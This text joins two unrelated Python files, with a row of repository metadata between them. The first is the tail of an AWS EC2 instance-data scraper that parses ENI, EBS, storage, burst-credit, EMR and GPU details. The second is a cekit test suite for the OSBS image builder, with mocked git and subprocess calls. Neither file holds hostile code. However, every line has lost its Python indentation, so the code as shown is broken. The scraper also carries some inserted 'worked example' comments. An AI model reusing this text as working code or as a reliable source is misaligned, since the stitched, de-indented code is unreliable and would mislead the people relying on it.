ip_per_eni = locale.atoi(etree.tostring(r[2], method='text').decode())
if instance_type not in by_type:
print("WARNING: Ignoring ENI data for unknown instance type: {}".format(instance_type))
continue
if not by_type[instance_type].vpc:
print(f"WARNING: DescribeInstanceTypes API does not have network info for {instance_type}, scraping instead")
by_type[instance_type].vpc = { 'max_enis': max_enis,
'ips_per_eni': ip_per_eni }
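# Hedged worked example of the "<cards>x<interfaces>" handling above: a cell that
# reads "4x15" would yield max_enis = 4 * 15 = 60 network interfaces.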
def add_ebs_info(instances):
"""
Three tables on this page:
1: EBS optimized by default
Instance type | Maximum bandwidth (Mib/s) | Maximum throughput (MiB/s, 128 KiB I/O) | Maximum IOPS (16 KiB I/O)
2: Baseline performance metrics for instances with asterisk (unsupported for now, see comment below)
Instance type | Baseline bandwidth (Mib/s) | Baseline throughput (MiB/s, 128 KiB I/O) | Baseline IOPS (16 KiB I/O)
3: Not EBS optimized by default
Instance type | Maximum bandwidth (Mib/s) | Maximum throughput (MiB/s, 128 KiB I/O) | Maximum IOPS (16 KiB I/O)
TODO: Support the asterisk on type names in the first table, which means:
"These instance types can support maximum performance for 30 minutes at least once every 24 hours. For example,
c5.large instances can deliver 281 MB/s for 30 minutes at least once every 24 hours. If you have a workload
that requires sustained maximum performance for longer than 30 minutes, select an instance type based on the
following baseline performance."
"""
def parse_ebs_table(by_type, table, ebs_optimized_by_default):
for row in table.xpath('tr'):
if row.xpath('th'):
continue
cols = row.xpath('td')
instance_type = sanitize_instance_type(totext(cols[0]).replace("*", ""))
ebs_max_bandwidth = locale.atof(totext(cols[1]))
ebs_throughput = locale.atof(totext(cols[2]))
ebs_iops = locale.atof(totext(cols[3]))
if instance_type not in by_type:
print(f"ERROR: Ignoring EBS info for unknown instance {instance_type}")
by_type[instance_type] = Instance()
# continue
by_type[instance_type].ebs_optimized_by_default = ebs_optimized_by_default
by_type[instance_type].ebs_throughput = ebs_throughput
by_type[instance_type].ebs_iops = ebs_iops
by_type[instance_type].ebs_max_bandwidth = ebs_max_bandwidth
return by_type
by_type = {i.instance_type: i for i in instances}
# Canonical URL for this info is https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ebs-optimized.html
# ebs_url = "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ebs-optimized.partial.html"
# It seems it's no longer dynamically loaded
ebs_url = "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ebs-optimized.html"
tree = etree.parse(urllib2.urlopen(ebs_url), etree.HTMLParser())
tables = tree.xpath('//div[@class="table-contents"]//table')
parse_ebs_table(by_type, tables[0], True)
parse_ebs_table(by_type, tables[2], False)
def add_linux_ami_info(instances):
"""Add information about which virtualization options are supported.
Note that only HVM is supported for Windows instances so that info is not
given its own column.
"""
checkmark_char = u'\u2713'
url = "http://aws.amazon.com/amazon-linux-ami/instance-type-matrix/"
tree = etree.parse(urllib2.urlopen(url), etree.HTMLParser())
table = tree.xpath('//div[@class="aws-table"]/table')[0]
rows = table.xpath('.//tr[./td]')[1:] # ignore header
for r in rows:
supported_types = []
family_id = totext(r[0]).lower()
if not family_id:
continue
# We only check the primary EBS-backed values here since the 'storage'
# column will already be able to tell users whether or not the instance
# they're looking at can use EBS and/or instance-store AMIs.
try:
if totext(r[1]) == checkmark_char:
supported_types.append('HVM')
if len(r) >= 4 and totext(r[3]) == checkmark_char:
supported_types.append('PV')
except Exception as e:
# 2018-08-01: handle missing cells on last row in this table...
print("Exception while parsing AMI info for {}: {}".format(family_id, e))
# Apply types for this instance family to all matching instances
for i in instances:
i_family_id = i.instance_type.split('.')[0]
if i_family_id == family_id:
i.linux_virtualization_types = supported_types
# http://aws.amazon.com/amazon-linux-ami/instance-type-matrix/ page is
# missing info about both older (t1, m1, c1, m2) and newer exotic (cg1,
# cr1, hi1, hs1, cc2) instance type generations.
# Adding "manual" info about older generations
# Some background info at https://github.com/powdahound/ec2instances.info/pull/161
for i in instances:
i_family_id = i.instance_type.split('.')[0]
if i_family_id in ('cc2', 'cg1', 'hi1', 'hs1'):
if not 'HVM' in i.linux_virtualization_types:
i.linux_virtualization_types.append('HVM')
if i_family_id in ('t1', 'm1', 'm2', 'c1', 'hi1', 'hs1'):
if not 'PV' in i.linux_virtualization_types:
i.linux_virtualization_types.append('PV')
def add_vpconly_detail(instances):
# A few legacy instances can be launched in EC2 Classic, the rest is VPC only
# https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-classic-platform.html#ec2-classic-instance-types
classic_families = ("m1", "m3", "t1", "c1", "c3", "cc2", "cr1", "m2", "r3", "d2", "hs1", "i2", "g2")
for i in instances:
for family in classic_families:
if i.instance_type.startswith(family):
i.vpc_only = False
def add_instance_storage_details(instances):
"""Add information about instance storage features."""
# Canonical URL for this info is http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/InstanceStorage.html
# url = "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/InstanceStorage.partial.html"
# It seems it's no longer dynamically loaded
url = "http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/InstanceStorage.html"
tree = etree.parse(urllib2.urlopen(url), etree.HTMLParser())
table = tree.xpath('//div[@class="table-contents"]/table')[0]
rows = table.xpath('.//tr[./td]')
checkmark_char = u'\u2714'
dagger_char = u'\u2020'
for r in rows:
columns = r.xpath('.//td')
(instance_type,
storage_volumes,
storage_type,
needs_initialization,
trim_support) = tuple(totext(i) for i in columns)
if instance_type is None:
continue
for i in instances:
if i.instance_type == instance_type:
i.ebs_only = True
m = re.search(r'(\d+)\s*x\s*([0-9,]+)?', storage_volumes)
if m:
i.ebs_only = False
i.num_drives = locale.atoi(m.group(1))
i.drive_size = locale.atoi(m.group(2))
i.ssd = 'SSD' in storage_type
i.nvme_ssd = 'NVMe' in storage_type
i.trim_support = checkmark_char in trim_support
i.storage_needs_initialization = checkmark_char in needs_initialization
i.includes_swap_partition = dagger_char in storage_volumes
def add_t2_credits(instances):
# Canonical URL for this info is
# http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/t2-credits-baseline-concepts.html
# url = "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/burstable-credits-baseline-concepts.partial.html"
# It seems it's no longer dynamically loaded
url = "http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/t2-credits-baseline-concepts.html"
tree = etree.parse(urllib2.urlopen(url), etree.HTMLParser())
table = tree.xpath('//div[@class="table-contents"]//table')[0]
rows = table.xpath('.//tr[./td]')
assert len(rows) > 0, "Failed to find T2 CPU credit info"
by_type = {i.instance_type: i for i in instances}
for r in rows:
if len(r) > 1:
inst_type = totext(r[0])
if not inst_type in by_type:
print(f"WARNING: skipping unknown instance type '{inst_type}' in CPU credit info table")
continue
inst = by_type[inst_type]
creds_per_hour = locale.atof(totext(r[1]))
inst.base_performance = creds_per_hour / 60
inst.burst_minutes = creds_per_hour * 24 / inst.vCPU
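# Hedged worked example of the credit arithmetic above (figures as published on the
# linked AWS page at the time of writing; treat them as illustrative): a t2.micro
# earning 6 CPU credits per hour gives base_performance = 6 / 60 = 0.10 (a 10%
# baseline) and, with 1 vCPU, burst_minutes = 6 * 24 / 1 = 144 minutes per day.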
def add_pretty_names(instances):
family_names = {
'c1': 'C1 High-CPU',
'c3': 'C3 High-CPU',
'c4': 'C4 High-CPU',
'c5': 'C5 High-CPU',
'c5d': 'C5 High-CPU',
'cc2': 'Cluster Compute',
'cg1': 'Cluster GPU',
'cr1': 'High Memory Cluster',
        'hi1': 'HI1 High I/O',
'hs1': 'High Storage',
'i3': 'I3 High I/O',
'm1': 'M1 General Purpose',
'm2': 'M2 High Memory',
'm3': 'M3 General Purpose',
'm4': 'M4 General Purpose',
'm5': 'M5 General Purpose',
'm5d': 'M5 General Purpose',
'g3': 'G3 Graphics GPU',
'g4': 'G4 Graphics and Machine Learning GPU',
'p2': 'P2 General Purpose GPU',
'p3': 'P3 High Performance GPU',
'p4d': 'P4D Highest Performance GPU',
'r3': 'R3 High-Memory',
'r4': 'R4 High-Memory',
'x1': 'X1 Extra High-Memory'
}
for i in instances:
pieces = i.instance_type.split('.')
family = pieces[0]
short = pieces[1]
prefix = family_names.get(family, family.upper())
extra = None
if short.startswith('8x'):
extra = 'Eight'
elif short.startswith('4x'):
extra = 'Quadruple'
elif short.startswith('2x'):
extra = 'Double'
elif short.startswith('10x'):
extra = 'Deca'
elif short.startswith('x'):
extra = ''
bits = [prefix]
if extra is not None:
bits.extend([extra, 'Extra'])
short = 'Large'
bits.append(short.capitalize())
i.pretty_name = ' '.join([b for b in bits if b])
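# Hedged worked example of the naming logic above: 'c4.8xlarge' splits into family
# 'c4' and size '8xlarge', producing the pieces ['C4 High-CPU', 'Eight', 'Extra',
# 'Large'] and therefore the pretty name "C4 High-CPU Eight Extra Large".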
def add_emr_info(instances):
url = "https://a0.awsstatic.com/pricing/1/emr/pricing-emr.min.js"
pricing = fetch_data(url)
def extract_prices(data):
ret = {}
for x in data["regions"]:
for inst in x["instanceTypes"]:
for size in inst["sizes"]:
if size["size"] not in ret:
ret[size["size"]] = {}
ret[size["size"]][x["region"]] = {
size["valueColumns"][0]["name"]:
size["valueColumns"][0]["prices"]["USD"],
size["valueColumns"][1]["name"]:
size["valueColumns"][1]["prices"]["USD"],
"currencies": data["currencies"],
"rate": data["rate"],
}
return ret
pricing = extract_prices(pricing["config"])
for inst in instances:
if inst.instance_type in pricing:
inst.emr = True
for region in inst.pricing:
if region in pricing[inst.instance_type]:
inst.pricing[region]["emr"] = pricing[
inst.instance_type][region]
def add_gpu_info(instances):
"""
Add info about GPUs from the manually-curated dictionaries below. They are
manually curated because GPU models and their corresponding CUDA Compute
Capability are not listed in a structured form anywhere in the AWS docs.
This function will print a warning if it encounters an instance with
.GPU > 0 for which GPU information is not included in the dictionaries
below. This may indicate that AWS has added a new GPU instance type. If you
see such a warning and want to fill in the missing information, check
https://aws.amazon.com/ec2/instance-types/#Accelerated_Computing for
descriptions of the instance types and https://en.wikipedia.org/wiki/CUDA
for information on the CUDA compute capability of different Nvidia GPU
models.
"""
gpu_data = {
'g2.2xlarge': {
# No longer listed in AWS docs linked above. Alternative source is
# https://medium.com/@manku_timma1/part-1-g2-2xlarge-gpu-basics-805ad40a37a4
# The model has 2 units, 4G of memory each, but AWS exposes only 1 unit per instance
'gpu_model': 'NVIDIA GRID K520',
'compute_capability': 3.0,
'gpu_count': 1,
'cuda_cores': 3072,
'gpu_memory': 4
},
'g2.8xlarge': {
# No longer listed in AWS docs linked above. Alternative source is
# https://aws.amazon.com/blogs/aws/new-g2-instance-type-with-4x-more-gpu-power/
'gpu_model': 'NVIDIA GRID K520',
'compute_capability': 3.0,
'gpu_count': 4,
'cuda_cores': 6144,
'gpu_memory': 16
},
'g3s.xlarge': {
'gpu_model': 'NVIDIA Tesla M60',
'compute_capability': 5.2,
'gpu_count': 1,
'cuda_cores': 2048,
'gpu_memory': 8
},
'g3.4xlarge': {
'gpu_model': 'NVIDIA Tesla M60',
'compute_capability': 5.2,
'gpu_count': 1,
'cuda_cores': 2048,
'gpu_memory': 8
},
'g3.8xlarge': {
'gpu_model': 'NVIDIA Tesla M60',
'compute_capability': 5.2,
'gpu_count': 2,
'cuda_cores': 4096,
'gpu_memory': 16
},
'g3.16xlarge': {
'gpu_model': 'NVIDIA Tesla M60',
'compute_capability': 5.2,
'gpu_count': 4,
'cuda_cores': 8192,
'gpu_memory': 32
},
'g4dn.xlarge': {
'gpu_model': 'NVIDIA T4 Tensor Core',
'compute_capability': 7.5,
'gpu_count': 1,
'cuda_cores': 2560,
'gpu_memory': 16
},
'g4dn.2xlarge': {
'gpu_model': 'NVIDIA T4 Tensor Core',
'compute_capability': 7.5,
'gpu_count': 1,
'cuda_cores': 2560,
'gpu_memory': 16
},
'g4dn.4xlarge': {
'gpu_model': 'NVIDIA T4 Tensor Core',
'compute_capability': 7.5,
'gpu_count': 1,
'cuda_cores': 2560,
'gpu_memory': 16
},
'g4dn.8xlarge': {
'gpu_model': 'NVIDIA T4 Tensor Core',
'compute_capability': 7.5,
'gpu_count': 1,
'cuda_cores': 2560,
'gpu_memory': 16
},
'g4dn.16xlarge': {
'gpu_model': 'NVIDIA T4 Tensor Core',
'compute_capability': 7.5,
'gpu_count': 1,
'cuda_cores': 2560,
'gpu_memory': 16
},
'g4dn.12xlarge': {
'gpu_model': 'NVIDIA T4 Tensor Core',
'compute_capability': 7.5,
'gpu_count': 4,
'cuda_cores': 10240,
'gpu_memory': 64
},
'g4dn.metal': {
'gpu_model': 'NVIDIA T4 Tensor Core',
'compute_capability': 7.5,
'gpu_count': 8,
'cuda_cores': 20480,
'gpu_memory': 128
},
'p2.xlarge': {
'gpu_model': 'NVIDIA Tesla K80',
'compute_capability': 3.7,
'gpu_count': 1,
'cuda_cores': 2496,
'gpu_memory': 12
},
'p2.8xlarge': {
'gpu_model': 'NVIDIA Tesla K80',
'compute_capability': 3.7,
'gpu_count': 4,
'cuda_cores': 19968,
'gpu_memory': 96
},
'p2.16xlarge': {
'gpu_model': 'NVIDIA Tesla K80',
'compute_capability': 3.7,
'gpu_count': 8,
'cuda_cores': 39936,
'gpu_memory': 192
},
'p3.2xlarge': {
'gpu_model': 'NVIDIA Tesla V100',
'compute_capability': 7.0,
'gpu_count': 1,
'cuda_cores': 5120,
'gpu_memory': 16
},
'p3.8xlarge': {
'gpu_model': 'NVIDIA Tesla V100',
'compute_capability': 7.0,
'gpu_count': 4,
'cuda_cores': 20480,
'gpu_memory': 64
},
'p3.16xlarge': {
'gpu_model': 'NVIDIA Tesla V100',
'compute_capability': 7.0,
'gpu_count': 8,
'cuda_cores': 40960,
'gpu_memory': 128
},
'p3dn.24xlarge': {
'gpu_model': 'NVIDIA Tesla V100',
'compute_capability': 7.0,
'gpu_count': 8,
'cuda_cores': 40960,
'gpu_memory': 256
},
'p4d.24xlarge': {
'gpu_model': 'NVIDIA A100',
'compute_capability': 8.0,
'gpu_count': 8,
'cuda_cores': 55296, # Source: Asked Matthew Wilson at AWS as this isn't public anywhere.
'gpu_memory': 320
},
}
for inst in instances:
if inst.GPU == 0:
continue
if inst.instance_type not in gpu_data:
print(f"WARNING: instance {inst.instance_type} has GPUs but is missing from gpu_data "
"dict in scrape.add_gpu_info. The dict needs to be updated manually.")
continue
inst_gpu_data = gpu_data[inst.instance_type]
inst.GPU_model = inst_gpu_data['gpu_model']
inst.compute_capability = inst_gpu_data['compute_capability']
inst.GPU_memory = inst_gpu_data['gpu_memory']
def add_availability_zone_info(instances):
"""
Add info about availability zones using information from the following APIs:
- aws ec2 describe-instance-type-offerings --region us-east-1
- aws ec2 describe-instance-type-offerings --location-type availability-zone --region us-east-1
- aws ec2 describe-availability-zones --region us-east-1
https://docs.aws.amazon.com/cli/latest/reference/ec2/describe-instance-type-offerings.html
"""
instance_type_region_availability_zones = {}
for region_name in ec2.describe_regions():
for offering in ec2.describe_instance_type_offerings(region_name=region_name, location_type='availability-zone-id'):
instance_type = offering['InstanceType']
availability_zone_id = offering['Location']
region_availability_zones = instance_type_region_availability_zones.get(instance_type, {})
availability_zones = region_availability_zones.get(region_name, [])
if availability_zone_id not in availability_zones:
availability_zones.append(availability_zone_id)
availability_zones.sort()
region_availability_zones[region_name] = availability_zones
instance_type_region_availability_zones[instance_type] = region_availability_zones
for inst in instances:
inst.availability_zones = instance_type_region_availability_zones.get(inst.instance_type, {})
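# Hedged illustration of the resulting shape (the zone ids below are placeholders,
# not scraped data): after this pass an instance carries something like
#   inst.availability_zones == {'us-east-1': ['use1-az1', 'use1-az2'], ...}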
def scrape(data_file):
"""Scrape AWS to get instance data"""
print("Parsing instance types...")
all_instances = ec2.get_instances()
print("Parsing pricing info...")
add_pricing_info(all_instances)
print("Parsing ENI info...")
add_eni_info(all_instances)
print("Parsing EBS info...")
add_ebs_info(all_instances)
print("Parsing Linux AMI info...")
add_linux_ami_info(all_instances)
print("Parsing VPC-only info...")
add_vpconly_detail(all_instances)
print("Parsing local instance storage...")
add_instance_storage_details(all_instances)
print("Parsing burstable instance credits...")
add_t2_credits(all_instances)
print("Parsing instance names...")
add_pretty_names(all_instances)
print("Parsing emr details...")
add_emr_info(all_instances)
print("Adding GPU details...")
add_gpu_info(all_instances)
print("Adding availability zone details...")
add_availability_zone_info(all_instances)
with open(data_file, 'w') as f:
json.dump([i.to_dict() for i in all_instances],
f,
indent=2,
sort_keys=True,
separators=(',', ': '))
if __name__ == '__main__':
scrape('www/instances.json')
| 38.960052
| 124
| 0.588562
|
09a181fbbe5b1f14e40f67c6b223e8eb7fd104df
| 19,049
|
py
|
Python
|
tests/test_integ_builder_osbs.py
|
hmlnarik/cekit
|
74df8c5258a3e843a82aa9ffa4b7c94781ee3433
|
[
"MIT"
] | null | null | null |
tests/test_integ_builder_osbs.py
|
hmlnarik/cekit
|
74df8c5258a3e843a82aa9ffa4b7c94781ee3433
|
[
"MIT"
] | null | null | null |
tests/test_integ_builder_osbs.py
|
hmlnarik/cekit
|
74df8c5258a3e843a82aa9ffa4b7c94781ee3433
|
[
"MIT"
] | null | null | null |
# -*- encoding: utf-8 -*-
# pylint: disable=protected-access
import logging
import os
import shutil
import subprocess
import yaml
import pytest
from click.testing import CliRunner
from cekit.cli import Cekit, Map, cli
from cekit.tools import Chdir
from cekit.config import Config
from cekit.errors import CekitError
from cekit.builders.osbs import OSBSBuilder
from cekit.tools import Map
config = Config()
@pytest.fixture(autouse=True)
def reset_config():
config.cfg['common'] = {}
config = Config()
config.cfg['common'] = {'redhat': True}
image_descriptor = {
'schema_version': 1,
'from': 'centos:latest',
'name': 'test/image',
'version': '1.0',
'labels': [{'name': 'foo', 'value': 'bar'}, {'name': 'labela', 'value': 'a'}],
'osbs': {
'repository': {
'name': 'repo',
'branch': 'branch'
}
}
}
def run_cekit(cwd,
parameters=['build', '--dry-run', 'docker'],
message=None, return_code=0):
with Chdir(cwd):
result = CliRunner().invoke(cli, parameters, catch_exceptions=False)
assert result.exit_code == return_code
if message:
assert message in result.output
return result
def run_osbs(descriptor, image_dir, mocker, return_code=0, build_command=None):
if build_command is None:
build_command = ['build', 'osbs']
# We are mocking it, so do not require it at test time
mocker.patch('cekit.builders.osbs.OSBSBuilder.dependencies', return_value={})
mocker.patch('cekit.builders.osbs.OSBSBuilder._wait_for_osbs_task')
mocker.patch('cekit.builders.osbs.DistGit.prepare')
mocker_check_output = mocker.patch.object(subprocess, 'check_output', side_effect=[
b"true", # git rev-parse --is-inside-work-tree
b"/home/repos/path", # git rev-parse --show-toplevel
b"branch", # git rev-parse --abbrev-ref HEAD
b"3b9283cb26b35511517ff5c0c3e11f490cba8feb", # git rev-parse HEAD
b"", # git ls-files .
b"", # git ls-files --others --exclude-standard
b"", # git diff-files --name-only
b"ssh://someuser@somehost.com/containers/somerepo", # git config --get remote.origin.url
b"3b9283cb26b35511517ff5c0c3e11f490cba8feb", # git rev-parse HEAD
b"1234", # brew call --python...
b"UUU"
])
with open(os.path.join(image_dir, 'config'), 'w') as fd:
fd.write("[common]\n")
fd.write("redhat = True")
with open(os.path.join(image_dir, 'image.yaml'), 'w') as fd:
yaml.dump(descriptor, fd, default_flow_style=False)
return run_cekit(image_dir, ['-v',
'--work-dir', image_dir,
'--config', 'config'] + build_command,
return_code=return_code)
def test_osbs_builder_with_assume_yes(tmpdir, mocker, caplog):
caplog.set_level(logging.DEBUG, logger="cekit")
# Specifically set the decision result to False, to fail any build
# that depends on the decision. But in case the --assume-yes switch is used
    # we should not get to this point at all. If we do, the test should fail.
mock_decision = mocker.patch('cekit.tools.decision', return_value=False)
mock_check_call = mocker.patch.object(subprocess, 'check_call')
mocker.patch.object(subprocess, 'call', return_value=1)
source_dir = tmpdir.mkdir('source')
source_dir.mkdir('osbs').mkdir('repo')
run_osbs(image_descriptor.copy(), str(source_dir), mocker, 0, ['build', 'osbs', '--assume-yes'])
mock_decision.assert_not_called()
mock_check_call.assert_has_calls(
[
mocker.call(['git', 'add', '--all', 'Dockerfile']),
mocker.call(['git', 'commit', '-q', '-m',
'Sync with path, commit 3b9283cb26b35511517ff5c0c3e11f490cba8feb']),
mocker.call(['git', 'push', '-q', 'origin', 'branch'])
])
assert "Committing with message: 'Sync with path, commit 3b9283cb26b35511517ff5c0c3e11f490cba8feb'" in caplog.text
assert "Image was built successfully in OSBS!" in caplog.text
def test_osbs_builder_with_push_with_sync_only(tmpdir, mocker, caplog):
"""
Should sync with dist-git repository without kicking the build
"""
caplog.set_level(logging.DEBUG, logger="cekit")
source_dir = tmpdir.mkdir('source')
repo_dir = source_dir.mkdir('osbs').mkdir('repo')
mocker.patch('cekit.tools.decision', return_value=True)
mocker.patch.object(subprocess, 'call', return_value=1)
mock_check_call = mocker.patch.object(subprocess, 'check_call')
descriptor = image_descriptor.copy()
run_osbs(descriptor, str(source_dir), mocker, 0, ['build', 'osbs', '--sync-only'])
assert os.path.exists(str(repo_dir.join('Dockerfile'))) is True
mock_check_call.assert_has_calls(
[
mocker.call(['git', 'add', '--all', 'Dockerfile']),
mocker.call(['git', 'commit', '-q', '-m',
'Sync with path, commit 3b9283cb26b35511517ff5c0c3e11f490cba8feb']),
mocker.call(['git', 'push', '-q', 'origin', 'branch'])
])
assert "Committing with message: 'Sync with path, commit 3b9283cb26b35511517ff5c0c3e11f490cba8feb'" in caplog.text
assert "The --sync-only parameter was specified, build will not be executed, exiting" in caplog.text
def test_osbs_builder_kick_build_without_push(tmpdir, mocker, caplog):
"""
Does not push sources to dist-git. This is the case when the
    generated files are the same as the ones already present in dist-git.
"""
caplog.set_level(logging.DEBUG, logger="cekit")
mocker.patch('cekit.tools.decision', return_value=True)
mocker.patch.object(subprocess, 'call', return_value=0)
source_dir = tmpdir.mkdir('source')
repo_dir = source_dir.mkdir('osbs').mkdir('repo')
mock_check_call = mocker.patch.object(subprocess, 'check_call')
descriptor = image_descriptor.copy()
run_osbs(descriptor, str(source_dir), mocker)
assert os.path.exists(str(repo_dir.join('Dockerfile'))) is True
mock_check_call.assert_has_calls(
[
mocker.call(['git', 'add', '--all', 'Dockerfile']),
])
assert "No changes made to the code, committing skipped" in caplog.text
assert "Image was built successfully in OSBS!" in caplog.text
def test_osbs_builder_kick_build_with_push(tmpdir, mocker, caplog):
"""
Does not push sources to dist-git. This is the case when the
generated files are the same as already existing in dist-git
"""
caplog.set_level(logging.DEBUG, logger="cekit")
source_dir = tmpdir.mkdir('source')
repo_dir = source_dir.mkdir('osbs').mkdir('repo')
mocker.patch('cekit.tools.decision', return_value=True)
mocker.patch.object(subprocess, 'call', return_value=1)
mock_check_call = mocker.patch.object(subprocess, 'check_call')
descriptor = image_descriptor.copy()
run_osbs(descriptor, str(source_dir), mocker)
assert os.path.exists(str(repo_dir.join('Dockerfile'))) is True
mock_check_call.assert_has_calls(
[
mocker.call(['git', 'add', '--all', 'Dockerfile']),
mocker.call(['git', 'commit', '-q', '-m',
'Sync with path, commit 3b9283cb26b35511517ff5c0c3e11f490cba8feb']),
mocker.call(['git', 'push', '-q', 'origin', 'branch'])
])
assert "Committing with message: 'Sync with path, commit 3b9283cb26b35511517ff5c0c3e11f490cba8feb'" in caplog.text
assert "Image was built successfully in OSBS!" in caplog.text
# https://github.com/cekit/cekit/issues/504
def test_osbs_builder_add_help_file(tmpdir, mocker, caplog):
"""
Checks if help.md file is generated and added to dist-git
"""
caplog.set_level(logging.DEBUG, logger="cekit")
mocker.patch('cekit.tools.decision', return_value=True)
source_dir = tmpdir.mkdir('source')
repo_dir = source_dir.mkdir('osbs').mkdir('repo')
mocker.patch.object(subprocess, 'call', return_value=0)
mock_check_call = mocker.patch.object(subprocess, 'check_call')
descriptor = image_descriptor.copy()
descriptor['help'] = {'add': True}
run_osbs(descriptor, str(source_dir), mocker)
assert os.path.exists(str(repo_dir.join('Dockerfile'))) is True
assert os.path.exists(str(repo_dir.join('help.md'))) is True
calls = [
mocker.call(['git', 'add', '--all', 'Dockerfile']),
mocker.call(['git', 'add', '--all', 'help.md']),
]
mock_check_call.assert_has_calls(calls, any_order=True)
assert len(mock_check_call.mock_calls) == len(calls)
assert "Image was built successfully in OSBS!" in caplog.text
# https://github.com/cekit/cekit/issues/394
def test_osbs_builder_add_extra_files(tmpdir, mocker, caplog):
"""
    Checks if the content of the 'osbs_extra' directory is copied to dist-git
"""
caplog.set_level(logging.DEBUG, logger="cekit")
mocker.patch('cekit.tools.decision', return_value=True)
source_dir = tmpdir.mkdir('source')
repo_dir = source_dir.mkdir('osbs').mkdir('repo')
dist_dir = source_dir.mkdir('osbs_extra')
dist_dir.join('file_a').write_text(u'Some content', 'utf8')
dist_dir.join('file_b').write_text(u'Some content', 'utf8')
dist_dir.mkdir('child').join('other').write_text(u'Some content', 'utf8')
os.symlink('/etc', str(dist_dir.join('a_symlink')))
mocker.patch.object(subprocess, 'call', return_value=0)
mock_check_call = mocker.patch.object(subprocess, 'check_call')
run_osbs(image_descriptor, str(source_dir), mocker)
assert os.path.exists(str(repo_dir.join('Dockerfile'))) is True
assert os.path.exists(str(repo_dir.join('file_a'))) is True
assert os.path.exists(str(repo_dir.join('file_b'))) is True
calls = [
mocker.call(['git', 'add', '--all', 'file_b']),
mocker.call(['git', 'add', '--all', 'file_a']),
mocker.call(['git', 'add', '--all', 'Dockerfile']),
mocker.call(['git', 'add', '--all', 'child']),
mocker.call(['git', 'add', '--all', 'a_symlink'])
]
mock_check_call.assert_has_calls(calls, any_order=True)
assert len(mock_check_call.mock_calls) == len(calls)
assert "Image was built successfully in OSBS!" in caplog.text
assert "Copying files to dist-git '{}' directory".format(str(repo_dir)) in caplog.text
assert "Copying 'target/image/file_b' to '{}'...".format(
os.path.join(str(repo_dir), 'file_b')) in caplog.text
assert "Staging 'file_a'..." in caplog.text
assert "Staging 'a_symlink'..." in caplog.text
# https://github.com/cekit/cekit/issues/394
def test_osbs_builder_add_extra_files_from_custom_dir(tmpdir, mocker, caplog):
"""
    Checks if the content of the custom-specified 'dist' directory is copied to dist-git
"""
caplog.set_level(logging.DEBUG, logger="cekit")
mocker.patch('cekit.tools.decision', return_value=True)
source_dir = tmpdir.mkdir('source')
repo_dir = source_dir.mkdir('osbs').mkdir('repo')
dist_dir = source_dir.mkdir('dist')
dist_dir.join('file_a').write_text(u'Some content', 'utf8')
dist_dir.join('file_b').write_text(u'Some content', 'utf8')
dist_dir.mkdir('child').join('other').write_text(u'Some content', 'utf8')
os.symlink('/etc', str(dist_dir.join('a_symlink')))
mocker.patch.object(subprocess, 'call', return_value=0)
mock_check_call = mocker.patch.object(subprocess, 'check_call')
descriptor = image_descriptor.copy()
descriptor['osbs']['extra_dir'] = 'dist'
run_osbs(descriptor, str(source_dir), mocker)
assert os.path.exists(str(repo_dir.join('Dockerfile'))) is True
assert os.path.exists(str(repo_dir.join('file_a'))) is True
assert os.path.exists(str(repo_dir.join('file_b'))) is True
calls = [
mocker.call(['git', 'add', '--all', 'file_b']),
mocker.call(['git', 'add', '--all', 'file_a']),
mocker.call(['git', 'add', '--all', 'Dockerfile']),
mocker.call(['git', 'add', '--all', 'child']),
mocker.call(['git', 'add', '--all', 'a_symlink'])
]
mock_check_call.assert_has_calls(calls, any_order=True)
assert len(mock_check_call.mock_calls) == len(calls)
assert "Image was built successfully in OSBS!" in caplog.text
assert "Copying files to dist-git '{}' directory".format(str(repo_dir)) in caplog.text
assert "Copying 'target/image/file_b' to '{}'...".format(
os.path.join(str(repo_dir), 'file_b')) in caplog.text
assert "Staging 'file_a'..." in caplog.text
assert "Staging 'a_symlink'..." in caplog.text
# https://github.com/cekit/cekit/issues/542
def test_osbs_builder_extra_default(tmpdir, mocker, caplog):
caplog.set_level(logging.DEBUG, logger="cekit")
source_dir = tmpdir.mkdir('source')
mocker.patch.object(subprocess, 'call', return_value=0)
mocker.patch.object(subprocess, 'check_call')
shutil.copytree(
os.path.join(os.path.dirname(__file__), 'modules'),
os.path.join(str(source_dir), 'tests', 'modules')
)
descriptor = image_descriptor.copy()
del descriptor['osbs']
run_osbs(descriptor, str(source_dir), mocker, return_code=1)
with open(os.path.join(str(source_dir), 'target', 'image.yaml'), 'r') as _file:
effective = yaml.safe_load(_file)
assert effective['osbs'] is not None
assert effective['osbs']['extra_dir'] == 'osbs_extra'
def test_osbs_builder_add_files_to_dist_git_without_dotgit_directory(tmpdir, mocker, caplog):
mocker.patch('cekit.tools.decision', return_value=True)
mocker.patch.object(subprocess, 'call')
mock_check_call = mocker.patch.object(subprocess, 'check_call')
res = mocker.Mock()
res.getcode.return_value = 200
res.read.side_effect = [b'test', None]
mocker.patch('cekit.descriptor.resource.urlopen', return_value=res)
repo_dir = tmpdir.mkdir('osbs').mkdir('repo').mkdir(
'.git').join('other').write_text(u'Some content', 'utf8')
descriptor = image_descriptor.copy()
descriptor['artifacts'] = [{'url': 'https://foo/bar.jar'}]
run_osbs(descriptor, str(tmpdir), mocker)
calls = [
mocker.call(['git', 'push', '-q', 'origin', 'branch']),
mocker.call(['git', 'commit', '-q', '-m',
'Sync with path, commit 3b9283cb26b35511517ff5c0c3e11f490cba8feb']),
mocker.call(['git', 'add', '--all', 'Dockerfile'])
]
mock_check_call.assert_has_calls(calls, any_order=True)
assert len(mock_check_call.mock_calls) == len(calls)
assert "Skipping '.git' directory" in caplog.text
def test_osbs_builder_with_koji_target_based_on_branch(tmpdir, mocker, caplog):
mocker.patch('cekit.tools.decision', return_value=True)
mocker.patch('cekit.descriptor.resource.urlopen')
mocker.patch.object(subprocess, 'call')
mocker.patch.object(subprocess, 'check_call')
tmpdir.mkdir('osbs').mkdir('repo').mkdir(
'.git').join('other').write_text(u'Some content', 'utf8')
descriptor = image_descriptor.copy()
run_osbs(descriptor, str(tmpdir), mocker)
